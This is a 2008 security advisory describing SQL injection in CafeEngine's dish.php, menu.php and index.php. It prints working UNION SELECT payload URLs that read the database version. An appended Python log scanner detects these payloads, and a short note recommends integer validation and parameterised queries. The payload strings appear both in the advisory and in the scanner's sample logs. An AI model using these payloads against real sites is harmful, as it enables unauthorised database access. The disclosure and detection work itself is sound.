CafeEngine Multiple Remote SQL Injection Vulnerabilities
Source: vfocus.net  Author: vfocus  Published: 2008-10-20
   ___________________________________________________________________________________________________________
  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  | 
  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ | 
  | |   /  \/                                                                                                 | 
  | |  / _____________________________________________________________________________________________________|
  | | / /                            .: CafeEngine Multiple remote SQL Injection :.                           | 
  | |/ /______________________________________________________________________________________________________|
  | v / Discovered By: 0xFFFFFF                            . Main THX: ALLAH                                  |
  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       | 
  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
  |/    Country:       Algeria                             .                                                  |
  v___________________________________________________________________________________________________________|
  |     Publication info :.                                                                                   |
  |___________________________________________________________________________________________________________|
  |     Date:          19-09-2008                          . Method   :         [*] GET   [ ] POST            |
  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
  |     Type:          SQL injection                       . Magic quotes :     [*] ON    [ ] OFF             | 
  |     Application:   Easy-Cafeengine / Cafeengine        . Risk:              [*] High  [ ] medium  [ ] Low | 
  |     Vendor site:   http://cafeengine.com/              .                                                  | 
  |     Version:       N/A                                 .                                                  |
  |     Impact:        Exploring Database                  .                                                  |
  |     Exploit:       Available                           .                                                  |
  |     Fix:           N/A                                 .                                                  |
  |___________________________________________________________________________________________________________|
  | Description :.                                                                                            |
  |___________________________________________________________________________________________________________|
  | The "id" input passed to the dish.php and menu.php pages is not properly validated,                       | 
  | so a visitor can easily get sensitive information from the database by injecting SQL queries.             |
  | ......................................................................................................... |
  |                                                                                                           |
  | CafeEngine Exploit :                                                                                      | 
  | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10                                            |
  | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12                                      |
  |                                                                                                           | 
  | Easy-CafeEngine Exploit:                                                                                  | 
  | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9                                          |
  |___________________________________________________________________________________________________________|
  | Notice :.                                                                                                 |
  |___________________________________________________________________________________________________________|
  | These publications are published for educational purposes, thus the author will not be responsible        |
  | for any damage.                                                                                           |
  |___________________________________________________________________________________________________________|
                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
                                                 \____________________________________________________________|

# [2008-10-16]
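
Added example (not part of the original advisory): a web-server log check for the three parameters the advisory names, flagging any value that is not a plain integer and labelling UNION SELECT attempts. The log lines are constructed samples, and the assumption that each parameter should only ever carry a positive integer record id is this example's, not the vendor's.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter the advisory reports as injectable. Assumption of this
# example: each one is meant to carry a positive integer record id only.
NUMERIC_PARAMS = {"dish.php": "id", "menu.php": "id", "index.php": "itemid"}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]{1,10}")
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Oct/2008:10:01:02 +0000] "GET /dish.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Oct/2008:10:01:09 +0000] "GET /dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10 HTTP/1.1" 200 4876',
    '203.0.113.9 - - [16/Oct/2008:10:01:11 +0000] "GET /menu.php?id=-1%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11,12 HTTP/1.1" 200 4901',
    '198.51.100.4 - - [16/Oct/2008:10:02:30 +0000] "GET /index.php?itemid=7%27 HTTP/1.1" 200 310',
    '198.51.100.4 - - [16/Oct/2008:10:02:41 +0000] "GET /index.php?page=about HTTP/1.1" 200 2210',
]


def classify(log_line):
    """Return None for benign lines, else (script, param, reason)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    param = NUMERIC_PARAMS.get(script)
    if param is None:
        return None
    # parse_qsl decodes %XX and turns '+' into a space, so percent-encoded
    # and plus-separated payloads normalise to the same string.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key != param or INT_RE.fullmatch(value):
            continue
        # The allow-list (integer only) is the real check; the UNION label
        # is only there to help triage.
        reason = "union-select" if UNION_RE.search(value) else "non-integer"
        return (script, param, reason)
    return None


def scan(lines):
    """Return (line_number, finding) for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]
```

The payloads in the advisory contain no quote characters, so quote escaping such as magic quotes does not neutralise them; on the application side the parameter has to be cast or validated as an integer and passed to a parameterised query.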
